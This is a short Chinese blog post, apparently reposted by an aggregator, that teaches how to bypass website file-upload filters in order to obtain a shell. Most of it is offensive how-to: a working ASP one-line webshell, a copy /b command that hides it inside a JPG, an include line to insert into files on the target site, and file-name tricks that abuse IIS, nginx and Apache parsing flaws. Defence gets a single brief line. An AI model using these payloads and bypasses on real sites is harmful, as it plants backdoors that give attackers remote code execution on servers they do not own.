突破文件上传漏洞

Posted 桃花雪

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了突破文件上传漏洞相关的知识,希望对你有一定的参考价值。

1.利用图片捆绑木马,绕过文件类型判断

有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会把一句话放在图片里面,写成1.asp;.jpg 1.asp;jpg的格式上传上去,这样上传的时候系统检测是图片,然后在上传之后,会把这个文件当asp文件来处理,那么如何用cmd来制作一句话木马呢.

利用copy命令
详细操作为
1.随便找一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了)
2.<%eval request("keio")%>           存为1.asp(就是一句话木马)
3.copy 1.jpg /b + 1.asp /a  2.jpg      存为1.bat文件

解释一下代码
复制当前目录下的 1.jpg 图片和当前目录下的 1.asp 文件并以ASCII代码的方式合并为 2.jpg 图片
运行 1.bat 就会出现一个图片 2.jpg
而这个2.jpg就是已经做好的木马了

把一句话木马合并到了图片里以后
再把以下代码插入目标网站的任意文件即可
<% #include files="2.jpg"%>

防御方法:主要是防止iis将图片解析成asp,aspx,php等进行执行,图片马是配合解析漏洞或者文件包含才能正常执行,iis之前版本存在解析漏洞

IS6.0 的解析漏洞 :1.jpg%00.php 1.asp;.jpg 1.asp/1.jpg
IIS 7.0/IIS 7.5/ nginx <8.03 畸形解析 1.jpg/.php
Nginx <8.03 空字节代码执行漏洞 1.jpg%00.php
Apache 解析漏洞 .php.一个无效后缀
还有就是 Windows 下的各种截断了,因为 win 环境下不允许一些符号命名文件,所以可以造成截断文件名的效果

以上是关于突破文件上传漏洞的主要内容,如果未能解决你的问题,请参考以下文章

关于文件上传漏洞

WebLogic任意文件上传漏洞(CVE-2019-2618)

CVE-2019-2618任意文件上传漏洞复现

CVE-2019-2618任意文件上传漏洞复现

手动挖掘漏洞

CVE-2019-2618 任意文件上传